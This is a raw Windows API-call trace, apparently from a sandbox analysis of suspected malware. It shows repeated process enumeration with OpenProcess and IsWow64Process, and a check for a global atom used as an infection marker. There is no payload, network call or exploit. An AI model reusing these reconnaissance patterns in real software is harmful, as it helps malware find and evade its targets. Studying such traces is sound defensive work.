	[0124.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.227] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.227] CloseHandle (hObject=0x69c) returned 1
	[0124.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.228] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.228] CloseHandle (hObject=0x69c) returned 1
	[0124.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.228] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.228] CloseHandle (hObject=0x69c) returned 1
	[0124.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.228] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.228] CloseHandle (hObject=0x69c) returned 1
	[0124.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.228] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.228] CloseHandle (hObject=0x69c) returned 1
	[0124.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.228] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.228] CloseHandle (hObject=0x69c) returned 1
	[0124.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.229] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.229] CloseHandle (hObject=0x69c) returned 1
	[0124.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.229] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.229] CloseHandle (hObject=0x69c) returned 1
	[0124.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.229] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.229] CloseHandle (hObject=0x69c) returned 1
	[0124.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.229] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.229] CloseHandle (hObject=0x69c) returned 1
	[0124.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.230] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.230] CloseHandle (hObject=0x69c) returned 1
	[0124.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.230] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.230] CloseHandle (hObject=0x69c) returned 1
	[0124.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.230] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.230] CloseHandle (hObject=0x69c) returned 1
	[0124.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.230] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.230] CloseHandle (hObject=0x69c) returned 1
	[0124.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.231] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.231] CloseHandle (hObject=0x69c) returned 1
	[0124.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.231] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.231] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.231] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.232] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.232] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.232] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.232] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.233] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.233] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.233] CloseHandle (hObject=0x69c) returned 1
	[0124.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.233] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.233] CloseHandle (hObject=0x69c) returned 1
	[0124.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.233] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.233] CloseHandle (hObject=0x69c) returned 1
	[0124.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.233] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.233] CloseHandle (hObject=0x69c) returned 1
	[0124.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.234] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.234] CloseHandle (hObject=0x69c) returned 1
	[0124.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.234] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.234] CloseHandle (hObject=0x69c) returned 1
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.270] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.270] CloseHandle (hObject=0x69c) returned 1
	[0124.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.270] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.270] CloseHandle (hObject=0x69c) returned 1
	[0124.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.271] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.271] CloseHandle (hObject=0x69c) returned 1
	[0124.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.271] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.271] CloseHandle (hObject=0x69c) returned 1
	[0124.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.271] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.271] CloseHandle (hObject=0x69c) returned 1
	[0124.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.271] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.271] CloseHandle (hObject=0x69c) returned 1
	[0124.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.272] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.272] CloseHandle (hObject=0x69c) returned 1
	[0124.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.272] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.272] CloseHandle (hObject=0x69c) returned 1
	[0124.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.272] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.272] CloseHandle (hObject=0x69c) returned 1
	[0124.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.273] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.273] CloseHandle (hObject=0x69c) returned 1
	[0124.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0124.273] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.273] CloseHandle (hObject=0x69c) returned 1
	[0124.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.273] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.273] CloseHandle (hObject=0x69c) returned 1
	[0124.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.273] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.273] CloseHandle (hObject=0x69c) returned 1
	[0124.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.273] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.273] CloseHandle (hObject=0x69c) returned 1
	[0124.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.274] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.274] CloseHandle (hObject=0x69c) returned 1
	[0124.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.274] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.274] CloseHandle (hObject=0x69c) returned 1
	[0124.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.274] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.274] CloseHandle (hObject=0x69c) returned 1
	[0124.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.274] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.274] CloseHandle (hObject=0x69c) returned 1
	[0124.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.275] CloseHandle (hObject=0x69c) returned 1
	[0124.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.275] CloseHandle (hObject=0x69c) returned 1
	[0124.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.276] CloseHandle (hObject=0x69c) returned 1
	[0124.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.276] CloseHandle (hObject=0x69c) returned 1
	[0124.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.276] CloseHandle (hObject=0x69c) returned 1
	[0124.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.276] CloseHandle (hObject=0x69c) returned 1
	[0124.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.276] CloseHandle (hObject=0x69c) returned 1
	[0124.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.277] CloseHandle (hObject=0x69c) returned 1
	[0124.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.277] CloseHandle (hObject=0x69c) returned 1
	[0124.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.277] CloseHandle (hObject=0x69c) returned 1
	[0124.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.277] CloseHandle (hObject=0x69c) returned 1
	[0124.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.278] CloseHandle (hObject=0x69c) returned 1
	[0124.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.278] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.278] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.279] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.279] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.279] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.279] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.279] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.279] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.279] CloseHandle (hObject=0x69c) returned 1
	[0124.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.280] CloseHandle (hObject=0x69c) returned 1
	[0124.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.280] CloseHandle (hObject=0x69c) returned 1
	[0124.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.280] CloseHandle (hObject=0x69c) returned 1
	[0124.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.280] CloseHandle (hObject=0x69c) returned 1
	[0124.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.281] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.281] CloseHandle (hObject=0x69c) returned 1
	[0124.314] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.314] CloseHandle (hObject=0x69c) returned 1
	[0124.314] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.314] CloseHandle (hObject=0x69c) returned 1
	[0124.314] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.314] CloseHandle (hObject=0x69c) returned 1
	[0124.314] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.314] CloseHandle (hObject=0x69c) returned 1
	[0124.315] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.315] CloseHandle (hObject=0x69c) returned 1
	[0124.315] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.315] CloseHandle (hObject=0x69c) returned 1
	[0124.315] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.315] CloseHandle (hObject=0x69c) returned 1
	[0124.315] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.316] CloseHandle (hObject=0x69c) returned 1
	[0124.316] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.316] CloseHandle (hObject=0x69c) returned 1
	[0124.316] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.316] CloseHandle (hObject=0x69c) returned 1
	[0124.316] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.316] CloseHandle (hObject=0x69c) returned 1
	[0124.316] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.317] CloseHandle (hObject=0x69c) returned 1
	[0124.317] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.317] CloseHandle (hObject=0x69c) returned 1
	[0124.317] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.317] CloseHandle (hObject=0x69c) returned 1
	[0124.317] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.317] CloseHandle (hObject=0x69c) returned 1
	[0124.317] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.317] CloseHandle (hObject=0x69c) returned 1
	[0124.318] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.318] CloseHandle (hObject=0x69c) returned 1
	[0124.318] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.318] CloseHandle (hObject=0x69c) returned 1
	[0124.318] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.318] CloseHandle (hObject=0x69c) returned 1
	[0124.318] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.318] CloseHandle (hObject=0x69c) returned 1
	[0124.318] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.318] CloseHandle (hObject=0x69c) returned 1
	[0124.319] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.319] CloseHandle (hObject=0x69c) returned 1
	[0124.319] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.319] CloseHandle (hObject=0x69c) returned 1
	[0124.319] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.319] CloseHandle (hObject=0x69c) returned 1
	[0124.319] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.319] CloseHandle (hObject=0x69c) returned 1
	[0124.319] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.320] CloseHandle (hObject=0x69c) returned 1
	[0124.320] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.320] CloseHandle (hObject=0x69c) returned 1
	[0124.320] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.320] CloseHandle (hObject=0x69c) returned 1
	[0124.320] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.320] CloseHandle (hObject=0x69c) returned 1
	[0124.320] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.321] CloseHandle (hObject=0x69c) returned 1
	[0124.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.321] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.321] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.322] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.322] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.322] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.322] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.322] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.322] CloseHandle (hObject=0x69c) returned 1
	[0124.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.323] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.323] CloseHandle (hObject=0x69c) returned 1
	[0124.323] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.323] CloseHandle (hObject=0x69c) returned 1
	[0124.323] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.323] CloseHandle (hObject=0x69c) returned 1
	[0124.323] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.323] CloseHandle (hObject=0x69c) returned 1
	[0124.323] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.323] CloseHandle (hObject=0x69c) returned 1
	[0124.356] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.356] CloseHandle (hObject=0x69c) returned 1
	[0124.356] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.356] CloseHandle (hObject=0x69c) returned 1
	[0124.356] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.356] CloseHandle (hObject=0x69c) returned 1
	[0124.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.357] CloseHandle (hObject=0x69c) returned 1
